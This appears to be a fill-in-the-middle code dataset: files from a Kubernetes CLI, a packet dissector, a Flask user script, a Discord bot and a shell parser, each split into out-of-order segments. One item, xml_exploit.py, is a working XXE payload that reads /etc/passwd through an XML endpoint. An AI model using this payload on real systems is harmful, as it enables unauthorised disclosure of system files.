let mut fmtvars = HashMap::new();
fmtvars.insert("name".to_string(), obj.name());
fmtvars.insert(
"namespace".to_string(),
obj.namespace.as_deref().unwrap_or("[none]"),
);
let ltime = Local::now().to_rfc3339();
fmtvars.insert("time".to_string(), <ime);
match strfmt(output, &fmtvars) {
Ok(file_path) => {
let pbuf = file_path.into();
write_logs_to_file(env, &pbuf, reader)?;
println!("Wrote logs to {}", pbuf.to_str().unwrap());
Ok(())
}
Err(e) => Err(ClickError::CommandError(format!(
"Can't generate output path: {}",
e
))),
}
} else if editor {
// We're opening in an editor, save to a temp
let editor = if let Some(v) = editor_opt {
v.to_owned()
} else if let Some(ref e) = env.click_config.editor {
e.clone()
} else {
match std::env::var("EDITOR") {
Ok(ed) => ed,
Err(e) => {
return Err(ClickError::CommandError(format!(
"Could not get EDITOR environment variable: {}",
e
)));
}
}
};
let tmpdir = match env.tempdir {
Ok(ref td) => td,
Err(ref e) => {
return Err(ClickError::CommandError(format!(
"Failed to create tempdir: {}",
e
)));
}
};
let file_path = tmpdir.path().join(format!(
"{}_{}_{}.log",
obj.name(),
cont,
Local::now().to_rfc3339()
));
write_logs_to_file(env, &file_path, reader)?;
clickwriteln!(writer, "Logs downloaded, starting editor");
let expr = if editor.contains(' ') {
// split the whitespace
let mut eargs: Vec<&str> = editor.split_whitespace().collect();
eargs.push(file_path.to_str().unwrap());
duct::cmd(eargs[0], &eargs[1..])
} else {
cmd!(editor, file_path)
};
expr.start()?;
Ok(())
} else {
let (sender, receiver) = channel();
thread::spawn(move || {
loop {
let mut line = String::new();
if let Ok(amt) = reader.read_line(&mut line) {
if amt > 0 {
if sender.send(line).is_err() {
// probably user hit ctrl-c, just stop
break;
}
} else {
break;
}
} else {
break;
}
}
});
while !env.ctrlcbool.load(Ordering::SeqCst) {
match receiver.recv_timeout(Duration::new(1, 0)) {
Ok(line) => {
clickwrite!(writer, "{}", line); // newlines already in line
}
Err(e) => {
if let RecvTimeoutError::Disconnected = e {
break;
}
}
}
}
Ok(())
}
}
Err(e) => Err(e),
}
}
command!(
Logs,
"logs",
"Get logs from a container in the current pod",
|clap: App<'static, 'static>| {
let ret = clap
.arg(
Arg::with_name("container")
.help("Specify which container to get logs from")
.required(false)
.index(1),
)
.arg(
Arg::with_name("follow")
.short("f")
.long("follow")
.help("Follow the logs as new records arrive (stop with ^C)")
.conflicts_with("editor")
.conflicts_with("output")
.takes_value(false),
)
.arg(
Arg::with_name("tail")
.short("t")
.long("tail")
.validator(valid_u32)
.help("Number of lines from the end of the logs to show")
.takes_value(true),
)
.arg(
Arg::with_name("previous")
.short("p")
.long("previous")
.help("Return previous terminated container logs")
.takes_value(false),
)
.arg(
Arg::with_name("since")
.long("since")
.conflicts_with("sinceTime")
.validator(valid_duration)
.help(
"Only return logs newer than specified relative duration,
e.g. 5s, 2m, 3m5s, 1h2min5sec",
)
.takes_value(true),
)
.arg(
Arg::with_name("sinceTime")
.long("since-time")
.conflicts_with("since")
.validator(valid_date)
.help(
"Only return logs newer than specified RFC3339 date. Eg:
1996-12-19T16:39:57-08:00",
)
.takes_value(true),
)
.arg(
Arg::with_name("timestamps")
.long("timestamps")
.help(
"Include an RFC3339 or RFC3339Nano timestamp at the beginning \
of every line of log output.",
)
.takes_value(false),
)
.arg(
Arg::with_name("editor")
.long("editor")
.short("e")
.conflicts_with("follow")
.conflicts_with("output")
.help(
"Open fetched logs in an editor rather than printing them out. with \
--editor ARG, ARG is used as the editor command, otherwise click \
environment editor (see set/env commands) is used, otherwise the \
$EDITOR environment variable is used.",
)
.takes_value(true)
.min_values(0),
)
.arg(
Arg::with_name("output")
.long("output")
.short("o")
.conflicts_with("editor")
.conflicts_with("follow")
.help(
"Write output to a file at the specified path instead of printing it. \
This path can be templated with {name}, {namespace}, and {time} to write \
individual files for each pod in a range. (See 'help ranges').",
)
.takes_value(true),
);
k8s_if_ge_1_17! {
let ret = ret.arg(
Arg::with_name("insecure")
.long("insecure-skip-tls-verify-backend")
.help("Skip verifying the identity of the kubelet that logs are requested from. \
This could allow an attacker to provide invalid logs. \
Useful if your kubelet serving certs have expired or similar.")
.takes_value(false)
)
}
ret
},
vec!["logs"],
vec![&completer::container_completer],
no_named_complete!(),
#[allow(clippy::cognitive_complexity)]
|matches, env, writer| {
let mut opts: api::ReadNamespacedPodLogOptional = Default::default();
if matches.is_present("follow") {
opts.follow = Some(true);
}
k8s_if_ge_1_17! {
if matches.is_present("insecure") {
opts.insecure_skip_tls_verify_backend = Some(true);
}
}
if matches.is_present("previous") {
opts.previous = Some(true);
}
if matches.is_present("tail") {
let lines = matches.value_of("tail").unwrap().parse::<i64>().unwrap();
opts.tail_lines = Some(lines);
}
if matches.is_present("since") {
// all unwraps already validated
let dur = parse_duration(matches.value_of("since").unwrap()).unwrap();
let dur = match i64::try_from(dur.as_secs()) {
Ok(d) => d,
Err(e) => {
clickwriteln!(writer, "Invalid duration in --since: {}", e);
return Ok(()); // TODO: Return error
}
};
opts.since_seconds = Some(dur);
}
if matches.is_present("sinceTime") {
let specified =
DateTime::parse_from_rfc3339(matches.value_of("sinceTime").unwrap()).unwrap();
let dur = Utc::now().signed_duration_since(specified.with_timezone(&Utc));
opts.since_seconds = Some(dur.num_seconds());
}
let timeout = if matches.is_present("follow") {
None
} else {
Some(Duration::new(20, 0)) // TODO what's a reasonable timeout here?
};
if matches.is_present("timestamps") {
opts.timestamps = Some(true);
}
env.apply_to_selection(
writer,
Some(&env.click_config.range_separator),
|obj, writer| {
if obj.is_pod() {
do_logs(
obj,
env,
opts,
matches.value_of("container"),
matches.value_of("output"),
matches.is_present("editor"),
matches.value_of("editor"),
timeout,
writer,
)
} else {
Err(ClickError::CommandError(
"Logs only available on a pod".to_string(),
))
}
},
)
}
);
| do_logs |
dissection.rs | use super::{AnyPdu, Pdu, RawPdu, Session, TempPdu};
use sniffle_ende::decode::Decode;
use sniffle_ende::nom::{self, combinator::map, Parser};
use std::marker::PhantomData;
#[derive(Debug, Clone, Copy)]
pub struct Priority(pub i32);
pub use sniffle_ende::decode::DResult;
pub use sniffle_ende::decode::DecodeError as DissectError;
pub trait Dissect: Pdu {
fn dissect<'a>(
buf: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self>;
fn | <'a>(session: &'a Session, parent: Option<TempPdu<'a>>) -> DissectParser<'a, Self> {
DissectParser {
session,
parent,
_marker: PhantomData,
}
}
}
pub struct DissectParser<'a, D: Dissect> {
session: &'a Session,
parent: Option<TempPdu<'a>>,
_marker: PhantomData<fn(D) -> D>,
}
pub trait Dissector {
type Out: Pdu;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out>;
}
pub struct AnyDissector(Box<dyn Dissector<Out = AnyPdu> + Send + Sync + 'static>);
pub struct DissectorTableParser<'a, T: DissectorTable> {
table: Option<&'a T>,
param: &'a T::Param,
session: &'a Session,
parent: Option<TempPdu<'a>>,
}
pub trait DissectorTable: Default {
type Param;
fn load<D: Dissector + Send + Sync + 'static>(
&mut self,
param: Self::Param,
priority: Priority,
dissector: D,
);
fn find(&self, param: &Self::Param) -> Option<&[AnyDissector]>;
fn dissector<'a>(
&'a self,
param: &'a Self::Param,
session: &'a Session,
parent: Option<TempPdu<'a>>,
) -> DissectorTableParser<'a, Self> {
DissectorTableParser {
table: Some(self),
param,
session,
parent,
}
}
fn dissect<'a>(
&self,
param: &Self::Param,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, AnyPdu> {
self.dissector(param, session, parent).parse(buffer)
}
fn dissect_or_raw<'a>(
&self,
param: &Self::Param,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, AnyPdu> {
self.dissector(param, session, parent)
.or(map(RawPdu::decode, AnyPdu::new))
.parse(buffer)
}
}
impl<'a, 'b, D: Dissect> Parser<&'a [u8], D, DissectError<'a>> for DissectParser<'b, D> {
fn parse(&mut self, input: &'a [u8]) -> DResult<'a, D> {
D::dissect(input, self.session, self.parent.clone())
}
}
impl<'a, 'b, T: DissectorTable> Parser<&'a [u8], AnyPdu, DissectError<'a>>
for DissectorTableParser<'b, T>
{
fn parse(&mut self, input: &'a [u8]) -> DResult<'a, AnyPdu> {
if let Some(table) = self.table {
for dissector in table.find(self.param).unwrap_or(&[]) {
match Dissector::dissect(dissector, input, self.session, self.parent.clone()) {
Ok((buf, pdu)) => {
return Ok((buf, pdu));
}
Err(nom::Err::Failure(e)) => {
return Err(nom::Err::Failure(e));
}
_ => {}
}
}
}
Err(nom::Err::Error(DissectError::Malformed))
}
}
impl<'a, T: DissectorTable> DissectorTableParser<'a, T> {
pub fn null_parser(
param: &'a T::Param,
session: &'a Session,
parent: Option<TempPdu<'a>>,
) -> Self {
Self {
table: None,
param,
session,
parent,
}
}
}
impl Dissector for AnyDissector {
type Out = AnyPdu;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out> {
self.0.dissect(buffer, session, parent)
}
}
impl<F, P> Dissector for F
where
P: Pdu,
F: for<'a> Fn(&'a [u8], &Session, Option<TempPdu<'_>>) -> DResult<'a, P>,
{
type Out = P;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out> {
self(buffer, session, parent)
}
}
struct DissectorAdapter<D: Dissector>(D);
impl<D: Dissector> Dissector for DissectorAdapter<D> {
type Out = AnyPdu;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out> {
self.0
.dissect(buffer, session, parent)
.map(|(rem, pdu)| (rem, AnyPdu::new(pdu)))
}
}
impl AnyDissector {
pub fn new<D: Dissector + Send + Sync + 'static>(dissector: D) -> Self {
Self(Box::new(DissectorAdapter(dissector)))
}
}
#[macro_export]
macro_rules! dissector_table {
($name:ident) => {
dissector_table!(__priv_decl, $name, ());
dissector_table!(__impl, $name, ());
};
(pub $name:ident) => {
dissector_table!(__pub_decl, $name, ());
dissector_table!(__impl, $name, ());
};
($name:ident, $param:ty) => {
dissector_table!(__priv_decl, $name, $param);
dissector_table!(__impl, $name, $param);
};
(pub $name:ident, $param:ty) => {
dissector_table!(__pub_decl, $name, $param);
dissector_table!(__impl, $name, $param);
};
(__priv_decl, $name:ident, ()) => {
struct $name(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
);
};
(__pub_decl, $name:ident, ()) => {
pub struct $name(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
);
};
(__priv_decl, $name:ident, $param:ty) => {
struct $name(
::std::collections::HashMap<
$param,
(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
),
>,
);
};
(__pub_decl, $name:ident, $param:ty) => {
pub struct $name(
::std::collections::HashMap<
$param,
(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
),
>,
);
};
(__impl, $name:ident, ()) => {
impl $name {
pub fn new() -> Self {
Self(::std::vec::Vec::new(), ::std::vec::Vec::new())
}
}
impl ::std::default::Default for $name {
fn default() -> Self {
Self::new()
}
}
impl $crate::DissectorTable for $name {
type Param = ();
fn load<D: $crate::Dissector + Send + Sync + 'static>(
&mut self,
_param: Self::Param,
priority: $crate::Priority,
dissector: D,
) {
let dissector = $crate::AnyDissector::new(dissector);
let pos = self
.0
.binary_search_by(|item| priority.0.cmp(&item.0))
.unwrap_or_else(|e| e);
self.0.insert(pos, priority);
self.1.insert(pos, dissector);
}
fn find(&self, _param: &Self::Param) -> Option<&[$crate::AnyDissector]> {
Some(&self.1[..])
}
}
};
(__impl, $name:ident, $param:ty) => {
impl $name {
pub fn new() -> Self {
Self(::std::collections::HashMap::new())
}
}
impl ::std::default::Default for $name {
fn default() -> Self {
Self::new()
}
}
impl $crate::DissectorTable for $name {
type Param = $param;
fn load<D: $crate::Dissector + Send + Sync + 'static>(
&mut self,
param: Self::Param,
priority: $crate::Priority,
dissector: D,
) {
let dissector = $crate::AnyDissector::new(dissector);
let table = self
.0
.entry(param)
.or_insert((::std::vec::Vec::new(), ::std::vec::Vec::new()));
let pos = table
.0
.binary_search_by(|item| priority.0.cmp(&item.0))
.unwrap_or_else(|e| e);
table.0.insert(pos, priority);
table.1.insert(pos, dissector);
}
fn find(&self, param: &Self::Param) -> Option<&[$crate::AnyDissector]> {
match self.0.get(param) {
Some(table) => Some(&table.1[..]),
None => None,
}
}
}
};
}
| dissector |
create_user.py | import sys,os
sys.path.append(os.path.dirname(os.getcwd()))
from app.models import User | u = User(username=sys.argv[1])
u.set_password(sys.argv[2])
db.session.add(u)
db.session.commit() | from app import db |
xml_exploit.py | import requests
| <!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text) | url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY> |
BeatSaver.ts | import { Message, MessageEmbed } from "discord.js";
import HexToDecimal from "../../Utils/HexToDecimal";
import ErrorEmbed from "../../Utils/Embeds/ErrorEmbed";
import BaseCommand from "../BaseCommand";
import CommandManager from "../CommandManager";
import BSApi from "beatsaver-api";
import * as types from "beatsaver-api/lib/types/BeatSaverSong";
import BeatSaverClient from "../../api/BeatSaver/BeatSaverClient";
import { BeatSaverMap, DiffsEntity, VersionsEntity } from "../../api/BeatSaver/Types";
const bs = BeatSaverClient;
const diffEmotes = {
Easy: "``Easy``",
Normal: "``Normal``",
Hard: "``Hard``",
Expert: "``Expert``",
ExpertPlus: "``Expert+``",
};
type diffIndexType = "Easy" | "Normal" | "Hard" | "Expert" | "ExpertPlus";
// Added by Sirspam with a little help from Aso
class BeatSaver extends BaseCommand {
async execute(msg: Message, args: string[]) {
try {
var Map = await bs.getMapFromId(args[0]);
} catch {
return ErrorEmbed("Map not found", "You should try e970 though");
}
// Store latest version so we don't have to get it every time
let LatestVersion = Map.versions[Map.versions.length - 1];
// Store the metadata so we don't have to reference it by Map.metadata everytime
// Also get the difficulty info and store date
let Meta = Map.metadata;
let difficulties = Difficulties(LatestVersion);
var date = new Date(Map.uploaded);
// Store the minutes and seconds in a variable so we can format them later
var minutes = Math.floor(Meta.duration / 60);
let seconds = Meta.duration - minutes * 60;
// Create the stats for the selected difficulty in the second argument
let stats = DifficultyStats(args[1] as diffIndexType, LatestVersion);
// Store Mod "Requirements" Array
let Requires = ModRequirements(stats);
// Create the embed
var embed = new MessageEmbed({
title: Meta.songSubName == "" ? Meta.songName : `${Meta.songName} - ${Meta.songSubName}`,
url: `https://beatsaver.com/beatmap/${args[0]}`,
description: `**${Meta.songAuthorName}**`,
image: {
url: LatestVersion.coverURL,
},
color: Color(Map),
fields: [
{
name: "Map Stats",
value: `⏱ Duration: ${minutes}:${seconds.toString().length != 1 ? seconds : `0${seconds}`}\n🥁 BPM: ${Meta.bpm}\n✏️ Mapper: ${Meta.levelAuthorName}\n⚔️ ${
Map.ranked ? "**Ranked**" : Map.qualified ? "**Qualified**" : "**Unranked**"
}`,
inline: true,
},
{
name: "BeatSaver Stats",
value: `🔑: ${Map.id}\n💾: ${Map.stats.downloads}\n👍: ${Map.stats.upvotes - Map.stats.downvotes}\n📅: ${date.getFullYear()}/${(date.getMonth() + 1)
.toString()
.padStart(2, "0")}/${date.getDate().toString().padStart(2, "0")}`,
inline: true,
},
{ name: "Difficulties", value: difficulties.string, inline: true },
{
name: `Difficulty Stats ${diffEmotes[stats.difficulty]}`,
value: `NPS: ${stats.nps}\nNJS: ${stats.njs}\nNotes: ${stats.notes}\n${
Requires.length != 0 ? `<:BK_ModRequired:872808303506391090> ${Requires.join(", ")}` : ""
}`,
inline: true,
},
{
name: "Links",
value: `[Preview Map](https://skystudioapps.com/bs-viewer/?id=${LatestVersion.key})\n[Download Map](${LatestVersion.downloadURL})`,
inline: true,
},
],
});
return embed;
}
label = "beatsaver";
aliases = ["bs", "bsr"];
description = "Returns information on a BeatSaver map";
Module = "Info";
}
// I hate this function so much, i never want to look at it again - Aso 26/07/21
// I had to look at it again - Aso 05/08/21
// Generates difficulty string and gets top difficulty
function Difficulties(LatestVersio | ntity) {
let Difficulties: diffIndexType[] = [];
let emoteString = "";
LatestVersion.diffs
.map((d) => d.difficulty)
.forEach((diff) => {
if (Difficulties.includes(diff)) return;
Difficulties.push(diff);
emoteString = emoteString.concat(`\n${diffEmotes[diff]}`);
});
return {
string: emoteString,
topDiff: Difficulties[Difficulties.length - 1],
};
}
// Generate difficulty stats, i.e NPS, NJS
// Also checks if `diff` is an actual difficulty, which also accounts for if the user doesn't provide a difficulty
function DifficultyStats(diff: diffIndexType, LatestVersion: VersionsEntity) {
let char = LatestVersion.diffs.find((d) => d.difficulty.toLowerCase() == diff);
if (!char) {
char = LatestVersion.diffs[LatestVersion.diffs.length - 1];
}
return char;
}
function ModRequirements(Diff: DiffsEntity) {
let Requires: string[] = [];
if (Diff.me) Requires.push("Mapping Extensions");
if (Diff.ne) Requires.push("Noodle Extensions");
if (Diff.chroma) Requires.push("Chroma");
if (Diff.cinema) Requires.push("Cinema");
return Requires;
}
function Color(Map: BeatSaverMap) {
if (Map.ranked) {
return "59ff85";
} else if (Map.qualified) {
return "ffcb59";
} else {
return "33A7FF";
}
}
CommandManager.registerCommand(new BeatSaver());
export default {
bs,
};
| n: VersionsE |
parse.rs | use std::{path::PathBuf, sync::Arc};
use bigdecimal::BigDecimal;
use indexmap::IndexMap;
use log::trace;
use nu_errors::{ArgumentError, ParseError};
use nu_path::expand_path;
use nu_protocol::hir::{
self, Binary, Block, Call, ClassifiedCommand, Expression, ExternalRedirection, Flag, FlagKind,
Group, InternalCommand, Member, NamedArguments, Operator, Pipeline, RangeOperator,
SpannedExpression, Synthetic, Unit,
};
use nu_protocol::{NamedType, PositionalType, Signature, SyntaxShape, UnspannedPathMember};
use nu_source::{HasSpan, Span, Spanned, SpannedItem};
use num_bigint::BigInt;
use crate::parse::source::parse_source_internal;
use crate::{lex::lexer::NewlineMode, parse::def::parse_parameter};
use crate::{
lex::lexer::{lex, parse_block},
ParserScope,
};
use crate::{
lex::{
lexer::Token,
tokens::{LiteBlock, LiteCommand, LitePipeline, TokenContents},
},
parse::def::lex_split_baseline_tokens_on,
};
use self::{
def::{parse_definition, parse_definition_prototype},
util::trim_quotes,
util::verify_and_strip,
};
mod def;
mod source;
mod util;
pub use self::util::garbage;
/// Parses a simple column path, one without a variable (implied or explicit) at the head
pub fn parse_simple_column_path(
lite_arg: &Spanned<String>,
) -> (SpannedExpression, Option<ParseError>) {
let mut delimiter = '.';
let mut inside_delimiter = false;
let mut output = vec![];
let mut current_part = String::new();
let mut start_index = 0;
let mut last_index = 0;
for (idx, c) in lite_arg.item.char_indices() {
last_index = idx;
if inside_delimiter {
if c == delimiter {
inside_delimiter = false;
}
} else if c == '\'' || c == '"' {
inside_delimiter = true;
delimiter = c;
} else if c == '.' {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + idx,
);
if let Ok(row_number) = current_part.parse::<i64>() {
output.push(Member::Int(row_number, part_span));
} else {
let trimmed = trim_quotes(¤t_part);
output.push(Member::Bare(trimmed.spanned(part_span)));
}
current_part.clear();
// Note: I believe this is safe because of the delimiter we're using,
// but if we get fancy with Unicode we'll need to change this.
start_index = idx + '.'.len_utf8();
continue;
}
current_part.push(c);
}
if !current_part.is_empty() {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + last_index + 1,
);
if let Ok(row_number) = current_part.parse::<i64>() {
output.push(Member::Int(row_number, part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(Member::Bare(current_part.spanned(part_span)));
}
}
(
SpannedExpression::new(Expression::simple_column_path(output), lite_arg.span),
None,
)
}
/// Parses a column path, adding in the preceding reference to $it if it's elided
pub fn parse_full_column_path(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
let mut inside_delimiter = vec![];
let mut output = vec![];
let mut current_part = String::new();
let mut start_index = 0;
let mut last_index = 0;
let mut error = None;
let mut head = None;
for (idx, c) in lite_arg.item.char_indices() {
last_index = idx;
if c == '(' {
inside_delimiter.push(')');
} else if let Some(delimiter) = inside_delimiter.last() {
if c == *delimiter {
inside_delimiter.pop();
}
} else if c == '\'' || c == '"' {
inside_delimiter.push(c);
} else if c == '.' {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + idx,
);
if head.is_none() && current_part.starts_with('(') && current_part.ends_with(')') {
let (invoc, err) =
parse_subexpression(¤t_part.clone().spanned(part_span), scope);
if error.is_none() {
error = err;
}
head = Some(invoc.expr);
} else if head.is_none() && current_part.starts_with('$') {
// We have the variable head
head = Some(Expression::variable(current_part.clone(), part_span))
} else if let Ok(row_number) = current_part.parse::<i64>() {
output.push(UnspannedPathMember::Int(row_number).into_path_member(part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(
UnspannedPathMember::String(current_part.clone()).into_path_member(part_span),
);
}
current_part.clear();
// Note: I believe this is safe because of the delimiter we're using,
// but if we get fancy with Unicode we'll need to change this.
start_index = idx + '.'.len_utf8();
continue;
}
current_part.push(c);
}
if !current_part.is_empty() {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + last_index + 1,
);
if head.is_none() {
if current_part.starts_with('(') && current_part.ends_with(')') {
let (invoc, err) = parse_subexpression(¤t_part.spanned(part_span), scope);
if error.is_none() {
error = err;
}
head = Some(invoc.expr);
} else if current_part.starts_with('$') {
head = Some(Expression::variable(current_part, lite_arg.span));
} else if let Ok(row_number) = current_part.parse::<i64>() {
output.push(UnspannedPathMember::Int(row_number).into_path_member(part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(UnspannedPathMember::String(current_part).into_path_member(part_span));
}
} else if let Ok(row_number) = current_part.parse::<i64>() {
output.push(UnspannedPathMember::Int(row_number).into_path_member(part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(UnspannedPathMember::String(current_part).into_path_member(part_span));
}
}
if let Some(head) = head {
(
SpannedExpression::new(
Expression::path(SpannedExpression::new(head, lite_arg.span), output),
lite_arg.span,
),
error,
)
} else {
(
SpannedExpression::new(
Expression::path(
SpannedExpression::new(
Expression::variable("$it".into(), lite_arg.span),
lite_arg.span,
),
output,
),
lite_arg.span,
),
error,
)
}
}
/// Parse a numeric range
fn parse_range(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
let lite_arg_span_start = lite_arg.span.start();
let lite_arg_len = lite_arg.item.len();
let (dotdot_pos, operator_str, operator) = if let Some(pos) = lite_arg.item.find("..<") {
(pos, "..<", RangeOperator::RightExclusive)
} else if let Some(pos) = lite_arg.item.find("..") {
(pos, "..", RangeOperator::Inclusive)
} else {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lite_arg.clone())),
);
};
if lite_arg.item[0..dotdot_pos].is_empty()
&& lite_arg.item[(dotdot_pos + operator_str.len())..].is_empty()
{
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lite_arg.clone())),
);
}
let numbers: Vec<_> = lite_arg.item.split(operator_str).collect();
if numbers.len() != 2 {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lite_arg.clone())),
);
}
let right_number_offset = operator_str.len();
let lhs = numbers[0].to_string().spanned(Span::new(
lite_arg_span_start,
lite_arg_span_start + dotdot_pos,
));
let rhs = numbers[1].to_string().spanned(Span::new(
lite_arg_span_start + dotdot_pos + right_number_offset,
lite_arg_span_start + lite_arg_len,
));
let left_hand_open = dotdot_pos == 0;
let right_hand_open = dotdot_pos == lite_arg_len - right_number_offset;
let left = if left_hand_open {
None
} else if let (left, None) = parse_arg(SyntaxShape::Number, scope, &lhs) {
Some(left)
} else {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lhs)),
);
};
let right = if right_hand_open {
None
} else if let (right, None) = parse_arg(SyntaxShape::Number, scope, &rhs) {
Some(right)
} else {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", rhs)),
);
};
(
SpannedExpression::new(
Expression::range(
left,
operator.spanned(Span::new(
lite_arg_span_start + dotdot_pos,
lite_arg_span_start + dotdot_pos + right_number_offset,
)),
right,
),
lite_arg.span,
),
None,
)
}
/// Parse any allowed operator, including word-based operators
fn parse_operator(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
let operator = match &lite_arg.item[..] {
"==" => Operator::Equal,
"!=" => Operator::NotEqual,
"<" => Operator::LessThan,
"<=" => Operator::LessThanOrEqual,
">" => Operator::GreaterThan,
">=" => Operator::GreaterThanOrEqual,
"=~" => Operator::Contains,
"!~" => Operator::NotContains,
"+" => Operator::Plus,
"-" => Operator::Minus,
"*" => Operator::Multiply,
"/" => Operator::Divide,
"in" => Operator::In,
"not-in" => Operator::NotIn,
"mod" => Operator::Modulo,
"&&" => Operator::And,
"||" => Operator::Or,
"**" => Operator::Pow,
_ => {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("operator", lite_arg.clone())),
);
}
};
(
SpannedExpression::new(Expression::operator(operator), lite_arg.span),
None,
)
}
/// Parse a duration type, eg '10day'
fn parse_duration(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
fn parse_decimal_str_to_number(decimal: &str) -> Option<i64> {
let string_to_parse = format!("0.{}", decimal);
if let Ok(x) = string_to_parse.parse::<f64>() {
return Some((1_f64 / x) as i64);
}
None
}
let unit_groups = [
(Unit::Nanosecond, "NS", None),
(Unit::Microsecond, "US", Some((Unit::Nanosecond, 1000))),
(Unit::Millisecond, "MS", Some((Unit::Microsecond, 1000))),
(Unit::Second, "SEC", Some((Unit::Millisecond, 1000))),
(Unit::Minute, "MIN", Some((Unit::Second, 60))),
(Unit::Hour, "HR", Some((Unit::Minute, 60))),
(Unit::Day, "DAY", Some((Unit::Minute, 1440))),
(Unit::Week, "WK", Some((Unit::Day, 7))),
];
if let Some(unit) = unit_groups
.iter()
.find(|&x| lite_arg.to_uppercase().ends_with(x.1))
{
let mut lhs = lite_arg.item.clone();
for _ in 0..unit.1.len() {
lhs.pop();
}
let input: Vec<&str> = lhs.split('.').collect();
let (value, unit_to_use) = match &input[..] {
[number_str] => (number_str.parse::<i64>().ok(), unit.0),
[number_str, decimal_part_str] => match unit.2 {
Some(unit_to_convert_to) => match (
number_str.parse::<i64>(),
parse_decimal_str_to_number(decimal_part_str),
) {
(Ok(number), Some(decimal_part)) => (
Some(
(number * unit_to_convert_to.1) + (unit_to_convert_to.1 / decimal_part),
),
unit_to_convert_to.0,
),
_ => (None, unit.0),
},
None => (None, unit.0),
},
_ => (None, unit.0),
};
if let Some(x) = value {
let lhs_span = Span::new(lite_arg.span.start(), lite_arg.span.start() + lhs.len());
let unit_span = Span::new(lite_arg.span.start() + lhs.len(), lite_arg.span.end());
return (
SpannedExpression::new(
Expression::unit(x.spanned(lhs_span), unit_to_use.spanned(unit_span)),
lite_arg.span,
),
None,
);
}
}
(
garbage(lite_arg.span),
Some(ParseError::mismatch("duration", lite_arg.clone())),
)
}
/// Parse a unit type, eg '10kb'
fn parse_filesize(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
fn parse_decimal_str_to_number(decimal: &str) -> Option<i64> {
let string_to_parse = format!("0.{}", decimal);
if let Ok(x) = string_to_parse.parse::<f64>() {
return Some((1_f64 / x) as i64);
}
None
}
let unit_groups = [
(Unit::Kilobyte, "KB", Some((Unit::Byte, 1000))),
(Unit::Megabyte, "MB", Some((Unit::Kilobyte, 1000))),
(Unit::Gigabyte, "GB", Some((Unit::Megabyte, 1000))),
(Unit::Terabyte, "TB", Some((Unit::Gigabyte, 1000))),
(Unit::Petabyte, "PB", Some((Unit::Terabyte, 1000))),
(Unit::Kibibyte, "KIB", Some((Unit::Byte, 1024))),
(Unit::Mebibyte, "MIB", Some((Unit::Kibibyte, 1024))),
(Unit::Gibibyte, "GIB", Some((Unit::Mebibyte, 1024))),
(Unit::Tebibyte, "TIB", Some((Unit::Gibibyte, 1024))),
(Unit::Pebibyte, "PIB", Some((Unit::Tebibyte, 1024))),
(Unit::Byte, "B", None),
];
if let Some(unit) = unit_groups
.iter()
.find(|&x| lite_arg.to_uppercase().ends_with(x.1))
{
let mut lhs = lite_arg.item.clone();
for _ in 0..unit.1.len() {
lhs.pop();
}
let input: Vec<&str> = lhs.split('.').collect();
let (value, unit_to_use) = match &input[..] {
[number_str] => (number_str.parse::<i64>().ok(), unit.0),
[number_str, decimal_part_str] => match unit.2 {
Some(unit_to_convert_to) => match (
number_str.parse::<i64>(),
parse_decimal_str_to_number(decimal_part_str),
) {
(Ok(number), Some(decimal_part)) => (
Some(
(number * unit_to_convert_to.1) + (unit_to_convert_to.1 / decimal_part),
),
unit_to_convert_to.0,
),
_ => (None, unit.0),
},
None => (None, unit.0),
},
_ => (None, unit.0),
};
if let Some(x) = value {
let lhs_span = Span::new(lite_arg.span.start(), lite_arg.span.start() + lhs.len());
let unit_span = Span::new(lite_arg.span.start() + lhs.len(), lite_arg.span.end());
return (
SpannedExpression::new(
Expression::unit(x.spanned(lhs_span), unit_to_use.spanned(unit_span)),
lite_arg.span,
),
None,
);
}
}
(
garbage(lite_arg.span),
Some(ParseError::mismatch("unit", lite_arg.clone())),
)
}
/// Parse the contents of a subexpression (the text between the wrapping
